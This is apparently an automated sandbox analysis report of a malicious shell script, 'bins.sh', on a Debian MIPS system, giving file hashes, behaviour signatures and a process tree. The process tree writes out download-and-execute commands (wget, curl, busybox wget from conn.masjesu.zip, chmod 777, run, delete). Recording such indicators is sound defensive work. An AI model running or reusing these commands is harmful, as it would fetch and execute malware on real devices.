Analysis

  • max time kernel
    139s
  • max time network
    151s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240611-en
  • resource tags

    arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    05/12/2024, 07:52

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    4ec351f49dc5766e37b9f2ca107ea79f

  • SHA1

    1e9e758cc6d6441d23748b0a346dcfc1df30e105

  • SHA256

    c4ffcebc0d441088029827d34c8dea73194328becf29e50825d908b5b2f5d661

  • SHA512

    5371efb6490ae01946e723c37b09df490d54cc86f0b773d9b3121e608345aca8f92c18f149031f0380cca92eb021bf656abe984568c20fbe7a135211af49e60c

  • SSDEEP

    192:8cfVNYb3Tjdl4z596v3m8MJeyct+8CB596v3w8MJeyhlI0VNYb3TS:8cydl1t+8ulIm

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 1 IoCs
  • Reads runtime system information 1 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 4 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 2 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:699
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:705
        • /usr/bin/wget
          wget http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:707
        • /usr/bin/curl
          curl -O http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB
          2⤵
          • Reads runtime system information
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:722
        • /bin/busybox
          /bin/busybox wget http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB
          2⤵
          • System Network Configuration Discovery
          PID:730
        • /bin/chmod
          chmod 777 zZM090BtLw96clc18K3325Bi3InWJUorwB
          2⤵
          • File and Directory Permissions Modification
          PID:810
        • /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB
          ./zZM090BtLw96clc18K3325Bi3InWJUorwB
          2⤵
          • Executes dropped EXE
          PID:811
        • /bin/rm
          rm zZM090BtLw96clc18K3325Bi3InWJUorwB
          2⤵
            PID:814
          • /usr/bin/wget
            wget http://conn.masjesu.zip/bins/ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG
            2⤵
            • System Network Configuration Discovery
            PID:815

        Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB

                Filesize

                177KB

                MD5

                786d75a158fe731feca3880f436082c0

                SHA1

                79ea2734e43d00cdeabed5586b2c1994d02aef3e

                SHA256

                5fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18

                SHA512

                7984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f